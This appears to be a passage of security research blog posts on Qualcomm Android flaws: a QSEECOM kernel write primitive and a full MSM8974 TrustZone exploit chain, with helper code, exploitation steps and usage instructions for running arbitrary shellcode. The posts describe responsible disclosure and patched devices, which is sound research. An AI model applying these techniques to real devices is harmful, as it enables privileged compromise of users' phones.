Meaning we can easily control the destination to which the primitive will write its data, by choosing the corresponding "wanted_offset" for each destination address.
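Choosing the two values for a given target could be sketched as below. "pick_params" is hypothetical. It assumes the validations only require "cmd_req_buf" to lie in [0x10000000, 0x90000000) and "cmd_buf_offset" to be at most the claimed length (with "cmd_req_len" also set to that length). It treats "wanted_offset" modulo 2^32, so the (0xFFFFFFFF + 1) term appears as a carry out of the 64-bit sum whenever it's needed.

```c
#include <stdint.h>

#define USER_BASE 0x10000000u  /* user_virt_sb_base in the running example */
#define FAKE_LEN  0x80000000u  /* claimed sb_len in the running example */

/* Pick cmd_req_buf and cmd_buf_offset so that the driver's 32-bit
 * calculation sb_virt - USER_BASE + cmd_req_buf + cmd_buf_offset
 * lands on target. */
static void pick_params(uint32_t sb_virt, uint32_t target,
                        uint32_t *cmd_req_buf, uint32_t *cmd_buf_offset)
{
    uint32_t wanted_offset = target - sb_virt;            /* mod 2^32 */
    uint64_t sum = (uint64_t)USER_BASE + wanted_offset;   /* buf + offset */
    uint64_t max_buf = (uint64_t)USER_BASE + FAKE_LEN - 1;

    if (sum <= max_buf) {
        /* Fits without an offset: point the request buffer straight at it. */
        *cmd_req_buf = (uint32_t)sum;
        *cmd_buf_offset = 0;
    } else {
        /* Max out the buffer pointer; the rest (at most FAKE_LEN) goes
         * into the offset, and the 32-bit sum wraps in the driver. */
        *cmd_req_buf = (uint32_t)max_buf;
        *cmd_buf_offset = (uint32_t)(sum - max_buf);
    }
}
```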

Exploiting the write primitive

Now that we have a write primitive, all that's left is to exploit it. Fortunately, our write primitive allows us to overwrite any kernel address. However, we still cannot control the data written. In fact, going over the code of the vulnerable "__qseecom_update_cmd_buf" function reveals that it writes a physical address related to the ION buffer to the target address:

However, recall that previously, when we discovered the address of "sb_virt", we did so by detecting a modified DWORD in a preallocated "sterile" dropzone. This means that the actual value of this physical address is in fact known to us at this point as well. Moreover, all physical addresses corresponding to the "System RAM" on Qualcomm devices are actually "low" addresses, meaning they are all lower than the kernel's virtual base address (0xC0000000).

With that in mind, all that's left for us is to overwrite a function pointer within the kernel with our write primitive. Since the DWORD written will correspond to an address which is within the user's virtual address space, we can simply allocate an executable code stub at that address, and redirect execution from that function stub to any other desired piece of code.

One such location containing function pointers can be found within the "pppolac_proto_ops" structure. This is the structure used within the kernel to register the function pointers used when interacting with sockets of the PPP_OLAC protocol. This structure is suitable because:

The PPP_OLAC protocol isn't widely used, so there's no immediate need to restore the overwritten function pointer
There are no special permissions needed in order to open a PPP_OLAC socket, other than the ability to create sockets
The structure itself is static and is not marked as "const", so it lives in the kernel's writeable data section

Putting it all together

At this point, we have the ability to execute arbitrary code within the kernel, thus completing our exploit. Here's a short recap of the steps we needed to perform:

Open the QSEECOM driver
Map an ION buffer
Register faulty memory parameters which include a fake huge memory buffer
Prepare a sterile dropzone in low user-space addresses
Trigger the write primitive into a low user-space address
Inspect the dropzone in order to deduce the address of "sb_virt" and the contents written in the write primitive
Allocate a small function stub at the address which is written by the write primitive
Trigger the write primitive in order to overwrite a function pointer within "pppolac_proto_ops"
Open a PPP_OLAC socket and trigger a call to the overwritten function pointer
Execute code within the kernel :)

Into the Wild

Shortly after the patch was issued and the vulnerability was fixed, a friend of mine alerted me to the fact that an exploit had been developed for the vulnerability and incorporated into a popular rooting kit (giefroot) in order to achieve kernel code execution.

Luckily, the exploit for the vulnerability was quite poorly written (I've fully reverse engineered it), and so it didn't support the full range of vulnerable devices.

Now that the issue has been fixed for a while, I feel that it's okay to share the full vulnerability writeup and exploit code, since all devices with kernels compiled after November 2014 should be patched. I've also deliberately left a single hardcoded symbol in the exploit to prevent widespread usage by script-kiddies (although this constraint can easily be removed by dynamically finding the pointer mentioned above during the exploit).

The Code

I've written an exploit for this vulnerability; you can find it here.

Building the exploit actually produces a shared library, which exports a function called "execute_in_kernel". You may use it to execute any given function within the context of the kernel. Play safe!

Timeline

24.09.14 - Vulnerability disclosed
24.09.14 - Initial response from QC
30.09.14 - Issue triaged by QC
19.11.14 - QC issues notice to customers
27.12.14 - Issue closed, CAF advisory issued

Full TrustZone exploit for MSM8974

2015-08-10T10:19:00.000+03:00

In this blog post, we'll cover the complete process of exploiting the TrustZone vulnerability described in the previous post. If you haven't read it already, please do!

Responsible Disclosure

First of all, I'd like to point out that I've responsibly disclosed this vulnerability to Qualcomm, and the issue has already been fixed (see "Timeline" below).

I'd also like to take this opportunity to point out that Qualcomm did an amazing job, both in responding to the disclosure very quickly and in being very keen to fix the issue as soon as possible.

They've also gifted me a brand new (at the time) Moto X 2014, which will be the subject of many posts later on (going much more in depth into TrustZone's architecture and other security components on the device).

Patient Zero

While developing this exploit, I only had my trusty (personal) Nexus 5 device to work with. This means that all memory addresses and other specific information written below are taken from that device.

In case anyone wants to recreate the exact research described below, or for any other reason, the exact version of my device at the time was:

google/hammerhead/hammerhead:4.4.4/KTU84P/1227136:user/release-keys

With that out of the way, let's get right to it!

The vulnerability primitive

If you read the previous post, you already know that the vulnerability allows the attacker to cause the TrustZone kernel to write a zero DWORD to any address in the TrustZone kernel's virtual address space.

Zero write primitives are, drawing on personal experience, not very fun to work with. They are generally quite limited, and don't always lead to exploitable conditions. In order to create a robust exploit using such a primitive, the first course of action would be to attempt to leverage this weak primitive into a stronger one.

Crafting an arbitrary write primitive

Since the TrustZone kernel is loaded at a known physical address, all of its addresses are already known in advance and do not need to be discovered at runtime.

However, the internal data structures and state of the TrustZone kernel are largely unknown and subject to change due to the many different processes interacting with the TrustZone kernel (from external interrupts, to "Secure World" applications, etc.).

Moreover, the TrustZone code segments are mapped with read-only access permissions, and are verified during the secure boot process. This means that once TrustZone's code is loaded into memory, it theoretically cannot (and should not) be subject to any change.

TrustZone memory mappings and permissions

So that said - how can we leverage a zero write primitive to enable full code execution?

We could try to modify some writeable data (such as the heap, the stack or perhaps globals) within the TrustZone kernel, which might give us a stepping stone towards a better primitive.

As we've mentioned in the previous blog post, normally, when an SCM command is called, any argument which is a pointer to memory is validated by the TrustZone kernel. The validation is done in order to make sure the physical address is within an "allowed" range, and isn't, for example, within the TrustZone kernel's used memory ranges.

These validations sound like a prime candidate for us to look into, since if we were able to disable their operation, we'd be able to leverage other SCM calls in order to create different kinds of primitives.

TrustZone memory validation

Let's start by giving the memory validation function a name - from now on, we'll call it "tzbsp_validate_memory".

Here's a decompilation of the function:

The function actually calls two internal functions to perform the validation, which we'll call "is_disallowed_range" and "is_allowed_range", respectively.

is_disallowed_range

As you can see, the function uses the top 12 bits of the given address (that is, the number of the 1MB chunk it falls in) in the following way:

The upper 7 bits are used as an index into a table containing 128 values, each 32 bits wide.
The lower 5 bits are used as the bit index to be checked within the 32-bit entry which is present at the previously indexed location.

In other words, for each 1MB chunk that intersects the region of memory to be validated, there exists a bit in the aforementioned table which denotes whether or not this chunk is "disallowed". If any chunk within the given region is disallowed, the function returns a value indicating as such. Otherwise, the function treats the given memory region as valid.
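A toy model of this bitmap lookup is shown below. The table contents, "mark_disallowed" and the decision to reject ranges that wrap past 4GB are assumptions. Only the indexing scheme follows the description above: the chunk number shifted right by 5 selects the word, and the chunk number masked with 31 selects the bit.

```c
#include <stdint.h>

/* 128 words x 32 bits = 4096 bits, one per 1MB chunk of a 4GB space. */
static uint32_t disallowed[128];

static int chunk_disallowed(uint32_t mb)  /* mb = address >> 20 */
{
    return (disallowed[mb >> 5] >> (mb & 31)) & 1;
}

/* Hypothetical helper to populate the table for the example. */
static void mark_disallowed(uint32_t addr)
{
    uint32_t mb = addr >> 20;
    disallowed[mb >> 5] |= 1u << (mb & 31);
}

/* Returns 1 if any 1MB chunk touched by [start, start + len) is disallowed. */
static int is_disallowed_range(uint32_t start, uint32_t len)
{
    uint64_t end = (uint64_t)start + len;  /* exclusive */

    if (len == 0)
        return 0;
    if (end > 0x100000000ULL)
        return 1;  /* wraps past 4GB: reject (assumption) */
    for (uint32_t mb = start >> 20; mb <= (uint32_t)((end - 1) >> 20); mb++)
        if (chunk_disallowed(mb))
            return 1;
    return 0;
}
```

Clearing all 128 words makes every chunk look allowed, which is the effect the zero write primitive can achieve on the real table.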

is_allowed_range

Although a little longer, this function is also quite simple. It iterates over a static array containing entries with the following structure:

The function iterates over each of the entries in the table which resides at the given memory address, stopping when the "end_marker" field for the current entry is 0xFFFFFFFF.

Each range specified by such an entry is checked against the given memory region to make sure that the region is allowed. However, as evidenced in the decompilation above, entries in which the second bit of the "flags" field is not set are skipped!

Attacking the validation functions

Now that we understand how the validation functions operate, let's see how we can use the zero write primitive in order to disable their operation.

First, as described above, the "is_disallowed_range" function uses a table of 32-bit entries, where each bit corresponds to a 1MB block of memory. Bits which are set to one represent disallowed blocks, and zero bits represent allowed blocks.

This means that we can easily neutralise this function by simply using the zero write primitive to set all the entries in the table to zero. In doing so, all blocks of memory will now be marked as allowed.

Moving on to the next function: "is_allowed_range". This one is a little trickier. As mentioned above, entries in which the second bit of the flags field is set are validated against the given address. However, any entry in which this bit is not set is skipped over, and no validation is performed for it.

In the device's table, only the first range is relevant to the memory ranges used by the TrustZone kernel, so we only need to zero out that entry's flags field. Doing so will cause the entry to be skipped over by the validation function, and, as a result, the validation function will accept memory addresses within the TrustZone kernel as valid.

Back to crafting a write primitive

So now that we've gotten rid of the bounds check functions, we can freely supply any memory address as an argument for an SCM call, and it will be operated upon without any obstacle.

But are we any closer to creating a write primitive? Ideally, had there been an SCM call where we could control a chunk of data which is written to a controlled location, that would have sufficed.

Unfortunately, after going over all of the SCM calls, it appears that there are no candidates which match this description.

Nevertheless, there's no need to worry! What cannot be achieved with a single SCM call, may be possible to achieve by stringing a few calls together. Logically, we can split the creation of an arbitrary write primitive into the following steps:

Create an uncontrolled piece of data at a controlled location
Control the created piece of data so that it actually contains the wanted content
Copy the created data to the target location

Create

Although none of the SCM calls seem to be good candidates in order to create a controlled piece of data, there is one call which can be used to create an uncontrolled piece of data at a controlled location - "tzbsp_prng_getdata_syscall".

This function, as its name implies, can be used to generate a buffer of random bytes at a given location. It is generally used by Android in order to harness the hardware PRNG which is present in Snapdragon SoCs.

In any case, the SCM call receives two arguments; the output address, and the output length (in bytes).

On the one hand, this is great: if we (somewhat) trust the hardware RNG, we can be pretty sure that for each byte we generate using this call, the entire range of byte values is possible as an output. On the other hand, this means that we have no control whatsoever over what data is actually going to be generated.

Control

Even though any output is possible when using the PRNG, perhaps there is a way to verify that the generated data is actually the data that we wish to write.

In order to do so, let's think of the following game: imagine you have a slot machine with four slots, each with 256 possible values. Each time you pull the lever, all the slots rotate simultaneously, and a random output is presented. How many times would you need to pull the lever in order for the outcome to perfectly match a value that you picked beforehand? Well, there are 4294967296 (2^32) possible values, so each time you pull the lever, there's a chance of about 2.3 × 10^(-10) that the result would match your wanted outcome. Sounds like you're going to be here for a while...

But what if you could cheat? For example, what if you had a different lever for each slot? That way you can only change the value of a single slot with each pull. This means that now for each time the lever is pulled, there's a chance of 1/256 that the outcome will match the desired value for that slot.

Sounds like the game is much easier now, right? But how much easier? In probability theory, this kind of distribution for a single "game" is called a Bernoulli distribution, which is just a fancy way of saying that each experiment has a fixed probability of success, denoted p, and all other outcomes are counted as failures, occurring with probability 1-p.

Assuming we would like a 90% chance of success, it turns out that in the original version of the game we would require approximately 10^10 attempts (!), but if we cheat, we would only require approximately 590 attempts per slot, which is many orders of magnitude fewer.
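As a quick check of these figures, here's the calculation, assuming each pull is an independent trial with success probability p. Since ln(1-p) is negative, dividing by it flips the inequality:

$$
\Pr[\text{success within } n \text{ pulls}] = 1 - (1-p)^n \ge 0.9
\quad\Longleftrightarrow\quad
n \ge \frac{\ln 0.1}{\ln(1-p)}
$$

$$
p = 2^{-32}: \quad n \ge \frac{\ln 0.1}{\ln\left(1 - 2^{-32}\right)} \approx 2.30 \cdot 2^{32} \approx 9.9 \times 10^{9}
$$

$$
p = \tfrac{1}{256}: \quad n \ge \frac{\ln 0.1}{\ln(255/256)} \approx 588.3, \quad\text{so } n = 589
$$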

So have you figured out how this all relates to our write primitive yet? Here it goes:

First, we need to find an SCM call which returns a value from a writeable memory location within the TrustZone kernel's memory, to the caller.

There are many such functions. One such candidate is the "tzbsp_fver_get_version" call. This function can be used by the "Normal World" in order to retrieve internal version numbers of different TrustZone components. It does so by receiving an integer denoting the component whose version should be retrieved, and an address to which the version code should be written. Then, the function simply goes over a static array of pairs containing the component ID, and the version code. When a component with the given ID is found, the version code is written to the output address.

tzbsp_fver_get_version internal array

Now, using the "tzbsp_prng_getdata_syscall" function, we can start manipulating any version code's value, one byte at a time. In order to know the value of the byte that we've generated at each iteration, we can simply issue the aforementioned SCM call, passing in the component ID matching the component whose version code we are modifying, and supplying an output address which points to a readable (that is, not in TrustZone) memory location.

We can repeat these first two steps until we are satisfied with the generated byte, before moving on to generate the next byte. This means that after a few iterations, we can be certain that the value of a specific version code matches our wanted DWORD.

Copy

Finally, we would like to write the generated value to a controlled location. Luckily, this step is pretty straightforward. All we need to do is call the "tzbsp_fver_get_version" SCM call once more, but this time supply the target address as the output address argument. This will cause the function to write our generated DWORD to a controlled location, thus completing our write gadget.
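The Create, Control and Copy steps can be simulated in a few lines. Everything here is a toy model: "tz_mem" stands in for TrustZone memory, and "mock_prng_getdata" and "mock_get_version" are hypothetical stand-ins for the two SCM calls. "VERSION_SLOT" and the little-endian byte order are assumptions.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

static uint8_t tz_mem[256];  /* toy "TrustZone memory" */
#define VERSION_SLOT 0x40    /* hypothetical location of one version code */

/* Create: fill [addr, addr + len) with random bytes. */
static void mock_prng_getdata(uint32_t addr, uint32_t len)
{
    for (uint32_t i = 0; i < len; i++)
        tz_mem[addr + i] = (uint8_t)(rand() & 0xFF);
}

/* Copy the stored version code to the output address. */
static void mock_get_version(uint8_t *out)
{
    memcpy(out, &tz_mem[VERSION_SLOT], 4);
}

/* Control: re-roll one byte at a time until the version code equals
 * want. Returns the number of PRNG calls used. */
static unsigned long forge_dword(uint32_t want)
{
    unsigned long calls = 0;

    for (int i = 0; i < 4; i++) {
        uint8_t wanted_byte = (uint8_t)(want >> (8 * i));  /* little-endian */
        uint8_t seen[4];
        do {
            mock_prng_getdata(VERSION_SLOT + i, 1);
            calls++;
            mock_get_version(seen);  /* read back into "Normal World" */
        } while (seen[i] != wanted_byte);
    }
    return calls;
}

/* Copy: request the version again, with the target as output address. */
static void write_dword(uint32_t target, uint32_t want)
{
    (void)forge_dword(want);
    mock_get_version(&tz_mem[target]);
}
```

Each byte takes 256 attempts on average, so forging a full DWORD costs roughly a thousand calls rather than billions.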

Phew... What now?

From here on, things get a little easier. First, although we have a write primitive, it is still quite cumbersome to use. Perhaps it would be a little easier if we were able to create a simpler gadget using the previous one.

We can do this by creating our own SCM call, which is simply a write-what-where gadget. This may sound tricky, but it's actually pretty straightforward.

In the previous blog post, we mentioned that all SCM calls are called indirectly via a large array containing, among other things, pointers to each of the SCM calls (along with the number of arguments they are provided, their name, etc.).

This means that we can use the write gadget we created previously in order to change the address of some SCM call which we deem to be "unimportant", to an address at which a write gadget already exists. Quickly going over the TrustZone kernel's code reveals that there are many such gadgets. Here's one example of such a gadget:

This piece of code will simply write the value in R0 to the address in R1, and return. Great.

Finally, it might also be handy to be able to read any memory location which is within the TrustZone kernel's virtual address space. This can be achieved by creating a read gadget, using the exact same method described above, in place of another "unimportant" SCM call. This gadget is actually quite a bit rarer than the write gadget. However, one such gadget was found within the TrustZone kernel:

This gadget returns the value read from the address in R0, with the offset R1. Awesome.
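Conceptually, hijacking the dispatch table works like the toy model below. The table layout, the IDs and the "unimportant" handlers are hypothetical, and memory is word-addressed for simplicity. In the real exploit, the function pointers would be overwritten using the forged-DWORD write described earlier rather than by a direct assignment.

```c
#include <stddef.h>
#include <stdint.h>

typedef uint32_t (*scm_handler)(uint32_t r0, uint32_t r1);

struct scm_entry {
    uint32_t id;
    const char *name;
    uint32_t nargs;
    scm_handler fn;
};

static uint32_t tz_words[64];  /* toy "TrustZone memory", word-addressed */

/* C equivalents of the two gadgets: *R1 = R0, and return *(R0 + R1). */
static uint32_t write_gadget(uint32_t r0, uint32_t r1) { tz_words[r1] = r0; return 0; }
static uint32_t read_gadget(uint32_t r0, uint32_t r1) { return tz_words[r0 + r1]; }

static uint32_t unimportant_a(uint32_t r0, uint32_t r1) { (void)r0; (void)r1; return 0; }
static uint32_t unimportant_b(uint32_t r0, uint32_t r1) { (void)r0; (void)r1; return 0; }

static struct scm_entry scm_table[] = {
    { 0x101, "unimportant_a", 2, unimportant_a },
    { 0x102, "unimportant_b", 2, unimportant_b },
};

/* Dispatch by ID through the table, the way SCM calls are looked up. */
static uint32_t scm_call(uint32_t id, uint32_t r0, uint32_t r1)
{
    for (size_t i = 0; i < sizeof scm_table / sizeof scm_table[0]; i++)
        if (scm_table[i].id == id)
            return scm_table[i].fn(r0, r1);
    return (uint32_t)-1;
}
```

After pointing the two entries at the gadgets, scm_call(0x101, value, index) writes "value" to tz_words[index], and scm_call(0x102, index, 0) reads it back.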

Writing new code

At this stage, we have full read-write access to the TrustZone kernel's memory. What we don't yet have is the ability to execute arbitrary code within the TrustZone kernel. Of course, one might argue that we could find different gadgets within the kernel, and string those together to create any wanted effect. But this is quite tiring if done manually (we would need to find quite a few gadgets), and quite difficult to do automatically.

There are a few possible ways to tackle this problem.

One possible angle of approach might be to write a piece of code in the "Normal World", and branch to it from the "Secure World". This sounds like an easy enough approach, but is actually much easier said than done.

As mentioned in the first blog post, when the processor is operating in secure mode, meaning the NS (Non-Secure) bit in the SCR (Secure Configuration Register) is turned off, it can only execute pages which are marked as "secure" in the translation table used by the MMU (that is, pages whose NS bit is off).

This means that in order to execute our code chunk residing in the "Normal World" we would first have to modify the TrustZone kernel's translation table in order to map the address in which we've written our piece of code as secure.

While all this is possible, it is a little tiresome.

A different approach might be to write new code within the TrustZone kernel's code segments, or overwrite existing code. This also has the advantage of allowing us to modify existing behaviour in the kernel, which can also come in handy later on.

However, at first glance this doesn't sound any easier to accomplish than the previous approach. After all, the TrustZone kernel's code segments are mapped as read-only.

However, this is only a minor setback! This can actually be solved without modifying the translation table after all, by using a convenient feature of the ARM MMU called "domains".

In the ARM translation table, each entry has a field which lists its permissions, as well as a field denoting the "domain" to which the translation belongs. There are 16 domains, and each translation belongs to a single one of them.

Within the ARM MMU, there is a register called the DACR (Domain Access Control Register). This 32-bit register has 16 pairs of bits, one pair for each domain, which specify how accesses to translations belonging to that domain are treated: "No access" (0b00) causes every access to fault, "Client" (0b01) checks each access against the access permissions of the translation, and "Manager" (0b11) allows every access without checking the permissions at all (0b10 is reserved).

Whenever the processor attempts to access a given memory address, the MMU looks up the domain of the translation for that address and inspects the corresponding bits in the DACR. If the domain is a "Client" domain, the access permissions of the translation are enforced as usual, and a disallowed access generates a fault.

If, however, the domain is a "Manager" domain, the access permissions are not checked, so no permission fault is generated and the access is allowed.

This means that simply setting the DACR's value to 0xFFFFFFFF will actually cause the MMU to enable access to any mapped memory address, for both read and write access, without generating a fault (and more importantly, without having to modify the translation table).

But how can we set the DACR? Apparently, during the TrustZone kernel's initialization, it also explicitly sets the DACR's value to a predetermined value (0x55555555), like so:

However, we can simply branch to the next opcode in the initialization function, while supplying our own value in R0, thus causing the DACR to be set to our controlled value.
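To make the DACR arithmetic concrete, here's a small Python sketch (my own, not part of the exploit) that packs and unpacks the two-bit per-domain fields. It assumes the ARMv7 short-descriptor encoding: 0b00 "No access", 0b01 "Client" (permissions checked), 0b10 reserved and 0b11 "Manager" (permissions not checked). Under that encoding, the initialization value 0x55555555 puts all 16 domains in Client mode, while 0xFFFFFFFF puts them all in Manager mode.

```python
# DACR helpers, assuming the ARMv7 short-descriptor encoding (2 bits per domain).
NO_ACCESS, CLIENT, RESERVED, MANAGER = 0b00, 0b01, 0b10, 0b11
NUM_DOMAINS = 16


def dacr_value(modes):
    """Pack a list of 16 per-domain modes (index = domain number) into a DACR value."""
    if len(modes) != NUM_DOMAINS:
        raise ValueError("expected one mode per domain (16 in total)")
    value = 0
    for domain, mode in enumerate(modes):
        value |= (mode & 0b11) << (2 * domain)
    return value


def domain_mode(dacr, domain):
    """Return the two-bit mode field of the given domain."""
    return (dacr >> (2 * domain)) & 0b11


def permissions_checked(dacr, domain):
    """True only for Client domains, whose accesses are checked against the permission bits."""
    return domain_mode(dacr, domain) == CLIENT


print(hex(dacr_value([CLIENT] * NUM_DOMAINS)))   # prints 0x55555555 (initialization value)
print(hex(dacr_value([MANAGER] * NUM_DOMAINS)))  # prints 0xffffffff (the "fully enabled" value)
```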

Now that the DACR is set, the path is all clear - we can simply write or overwrite code within the TrustZone kernel.

In order to make things a little easier (and less disruptive), it's probably better to write code at a location which is unused by the TrustZone kernel. One such candidate is a "code cave".

Code caves are simply areas (typically at the end of allocated memory regions) which are unused (i.e., do not contain code), but are nonetheless mapped and valid. They usually occur because memory mappings have a fixed granularity, so quite frequently there is internal fragmentation at the end of a mapped segment.

Within the TrustZone kernel there are several such code caves, which enable us to write small pieces of code within them and execute them, with minimal hassle.
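To find candidates, here's a simple Python sketch that scans a segment's contents for word-aligned runs of padding bytes. It's only a heuristic, and the assumptions are mine: it assumes unused space is zero-filled (pass a different fill byte otherwise), and a run of zeros in the middle of a segment could just as well be a zero-initialised table, so runs that reach the end of a segment are the safest bet, and any candidate should be double-checked in the disassembler before writing to it.

```python
def find_code_caves(data, base, min_size=64, fill=0x00):
    """Return (address, size) pairs for word-aligned runs of `fill` bytes.

    `data` is a segment's contents and `base` the address it is mapped at.
    A run only counts as a cave if it is at least `min_size` bytes long.
    """
    filler = bytes([fill]) * 4
    end = len(data) - len(data) % 4       # ignore a trailing partial word
    caves = []
    run_start = None
    for off in range(0, end, 4):
        if data[off:off + 4] == filler:
            if run_start is None:
                run_start = off
            continue
        if run_start is not None and off - run_start >= min_size:
            caves.append((base + run_start, off - run_start))
        run_start = None
    # A run that reaches the end of the segment is the classic code cave.
    if run_start is not None and end - run_start >= min_size:
        caves.append((base + run_start, end - run_start))
    return caves
```

For example, find_code_caves(segment_bytes, segment_vaddr) would list the candidate caves of one segment, where segment_bytes and segment_vaddr are placeholders for a segment's contents and load address.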

Putting it all together

So this exploit was a little complex. Here's a run-down of all the stages we had to complete:

Disable the memory validation functions using the zero write primitive
Craft a wanted DWORD at a controlled location using the TrustZone PRNG
Verify the crafted DWORD by reading the corresponding version code
Write the crafted version code to the location of a function pointer to an existing SCM call (by doing so creating a fast write gadget)
Use the fast write gadget to create a read gadget
Use the fast write gadget to write a function pointer to a gadget which enables us to modify the DACR
Modify the DACR to be fully enabled (0xFFFFFFFF)
Write code to a code cave within the TrustZone kernel
Execute! :)

The Code

I've written an exploit for this vulnerability, including all the needed symbols for the Nexus 5 (with the fingerprint stated beforehand).

First of all, in order to enable the exploit to send the needed crafted SCM calls to the TrustZone kernel, I've created a patched version of the msm-hammerhead kernel which adds such functionality and exposes it to user-space Android.

I've chosen to do this by adding some new IOCTLs to an existing driver, QSEECOM (mentioned in the first blog post), which is a Qualcomm driver used to interface with the TrustZone kernel. These IOCTLs enable the caller to send a "raw" SCM call (either regular, or atomic) to the TrustZone kernel, containing any arbitrary data.

You can find the needed kernel modifications here.

For those of you using a Nexus 5 device, I personally recommend following Marcin Jabrzyk's great tutorial - here (it's a full tutorial describing how to compile and boot a custom kernel without flashing it to the device).

After booting the device with a modified kernel, you'll need a user-space application which can use the newly added IOCTLs in order to send SCMs to the kernel.

I've written such an application, which you can get here.

Finally, the exploit itself is written in python. It uses the user-space application to send SCM calls via the custom kernel directly to the TrustZone kernel, and allows execution of any arbitrary code within the kernel.

You can find the full exploit's code here.

Using the exploit

Using the exploit is pretty straightforward. Here's what you have to do:

Boot the device using the modified kernel (see Marcin's tutorial)
Compile the FuzzZone binary and place it under /data/local/tmp/
Write any ARM code within the shellcode.S file
Execute the build_shellcode.sh script in order to create a shellcode binary
Execute exploit.py to run your code within the TrustZone kernel

Affected Devices

At the time of disclosure, this vulnerability affected all devices with the MSM8974 SoC. I created a script to statically check the ROMs of many such devices before reporting the vulnerability, and found that the following devices were vulnerable:

Note: This vulnerability has since been fixed by Qualcomm, and therefore should no longer affect up-to-date devices. Also, please note that the following list is by no means exhaustive. It's simply the result of my static analysis at the time.

 -Samsung Galaxy S5
 -Samsung Galaxy Note III
 -Samsung Galaxy S4 
 -Samsung Galaxy Tab Pro 10.1
 -Samsung Galaxy Note Pro 12.2
 -HTC One
 -LG G3
 -LG G2
 -LG G Flex 
 -Sony Xperia Z3 Compact 
 -Sony Xperia Z2 
 -Sony Xperia Z Ultra 
 -Samsung Galaxy S5 Active
 -Samsung Galaxy S5 TD-LTE
 -Samsung Galaxy S5 Sport
 -HTC One (E8)
 -Oneplus One
 -Acer Liquid S2
 -Asus PadFone Infinity
 -Gionee ELIFE E7
 -Sony Xperia Z1 Compact
 -Sony Xperia Z1s
 -ZTE Nubia Z5s
 -Sharp Aquos Xx 302SH
 -Sharp Aquos Xx mini 303SH
 -LG G Pro 2
 -Samsung Galaxy J
 -Samsung Galaxy Note 10.1 2014 Edition (LTE variant)
 -Samsung Galaxy Note 3 (LTE variant)
 -Pantech Vega Secret UP
 -Pantech Vega Secret Note
 -Pantech Vega LTE-A
 -LG Optimus Vu 3
 -Lenovo Vibe Z LTE
 -Samsung Galaxy Tab Pro 8.4
 -Samsung Galaxy Round
 -ZTE Grand S II LTE
 -Samsung Galaxy Tab S 8.4 LTE
 -Samsung Galaxy Tab S 10.5 LTE
 -Samsung Galaxy Tab Pro 10.1 LTE
 -Oppo Find 7 Qing Zhuang Ban
 -Vivo Xshot Elite
 -IUNI U3
 -Hisense X1
 -Hisense X9T
 -Pantech Vega Iron 2 (A910)
 -Vivo Xplay 3S
 -ZTE Nubia Z5S LTE
 -Sony Xperia Z2 Tablet (LTE variant)
 -Oppo Find 7a International Edition
 -Sharp Aquos Xx304SH
 -Sony Xperia ZL2 SOL25
 -Sony Xperia Z2a
 -Coolpad 8971
 -Sharp Aquos Zeta SH-04F
 -Asus PadFone S
 -Lenovo K920 TD-LTE (China Mobile version)
 -Gionee ELIFE E7L
 -Oppo Find 7
 -ZTE Nubia X6 TD-LTE 128 GB
 -Vivo Xshot Ultimate
 -LG Isai FL
 -ZTE Nubia Z7
 -ZTE Nubia Z7 Max
 -Xiaomi Mi 4
 -InFocus M810

Timeline

19.09.14 - Vulnerability disclosed
19.09.14 - Initial response from QC
22.09.14 - Issue confirmed by QC
01.10.14 - QC issues notice to customers
16.10.14 - QC issues notice to carriers, request for 14 days of embargo
30.10.14 - Embargo expires

I'd like to also point out that after reporting this issue to Qualcomm, I was informed that it has already been internally identified by them prior to my disclosure. However, these kinds of issues require quite a long period of time in order to push a fix, and therefore at the time of my research, the fix had not yet been deployed (at least, not to the best of my knowledge).

Last Words

I'd really like to hear some feedback from you, so please leave a comment below! Feel free to ask about anything.

Exploring Qualcomm's TrustZone implementation

2015-08-04T22:49:00.000+03:00

In this blog post, we'll be exploring Qualcomm's TrustZone implementation, as present on Snapdragon SoCs. If you haven't already, you might want to read the previous blog post, in which I go into some detail about TrustZone in general.

Where do we start?

First of all, since Qualcomm's TrustZone implementation is closed-source, and as far as I could tell, there are no public documents detailing its architecture or design, we will probably need to reverse-engineer the binary containing the TrustZone code, and analyse it.

Acquiring the TrustZone image

We can attempt to extract the image from two different locations; either from the device itself, or from a factory image of the device.

My personal Nexus 5 device was already rooted, so extracting the image from the device should be pretty straightforward. Since the image is stored on the eMMC chip, and the blocks and partitions of the eMMC chip are available under "/dev/block/platform/msm_sdcc.1", I could simply copy the relevant partition to my desktop (using "dd").

Moreover, the partitions have meaningfully named links to them under "/dev/block/platform/msm_sdcc.1/by-name":

As you can see, there are two partitions here, one named "tz" (short for TrustZone), and one named "tzb", which serves as a backup image to the "tz" image, and is identical to it.

However, having extracted the image this way, I was still rather unsatisfied, for two reasons:

Although the TrustZone image is stored on the eMMC chip, it could easily be made inaccessible to the "Normal World" (by requiring the AxPROT bit on the system bus to be set), or several parts of it could be missing.
Pulling the entire partition's data doesn't reveal information about the real (logical) boundary of the image, so it will require some extra work to determine where the image actually ends. (Actually, since the "tz" image is an ELF binary, its size can be derived from the ELF headers, but that's just a lucky break for us).
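Since a raw partition dump is padded well past the end of the image, here's a rough Python sketch of how the logical end could be recovered from the ELF headers. It assumes a little-endian ELF32 file and simply takes the furthest byte referenced by the ELF header, the program and section header tables, and the segment and section contents; any data appended outside of what the headers describe would be cut off.

```python
import struct

SHT_NOBITS = 8  # sections such as .bss occupy no space in the file


def elf32_logical_size(blob):
    """Estimate where a little-endian ELF32 image ends inside a larger raw dump."""
    if blob[:4] != b"\x7fELF" or blob[4] != 1 or blob[5] != 1:
        raise ValueError("expected a 32-bit little-endian ELF file")
    phoff, shoff = struct.unpack_from("<II", blob, 28)
    ehsize, phentsize, phnum, shentsize, shnum = struct.unpack_from("<5H", blob, 40)

    # The ELF header and program header table themselves.
    end = max(ehsize, phoff + phentsize * phnum)
    # Segment contents: p_offset and p_filesz of each program header.
    for i in range(phnum):
        entry = phoff + i * phentsize
        p_offset, = struct.unpack_from("<I", blob, entry + 4)
        p_filesz, = struct.unpack_from("<I", blob, entry + 16)
        end = max(end, p_offset + p_filesz)
    # Section header table and the contents of sections that live in the file.
    if shnum:
        end = max(end, shoff + shentsize * shnum)
        for i in range(shnum):
            entry = shoff + i * shentsize
            sh_type, = struct.unpack_from("<I", blob, entry + 4)
            sh_offset, sh_size = struct.unpack_from("<II", blob, entry + 16)
            if sh_type != SHT_NOBITS:
                end = max(end, sh_offset + sh_size)
    return end
```

Trimming a dump would then just be dump[:elf32_logical_size(dump)].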

So, having extracted one image from the device, let's take a look at a factory image.

The Nexus 5's factory images are all available to download from Google. The factory image contains a ZIP with all the default images, and additionally contains the bootloader image.

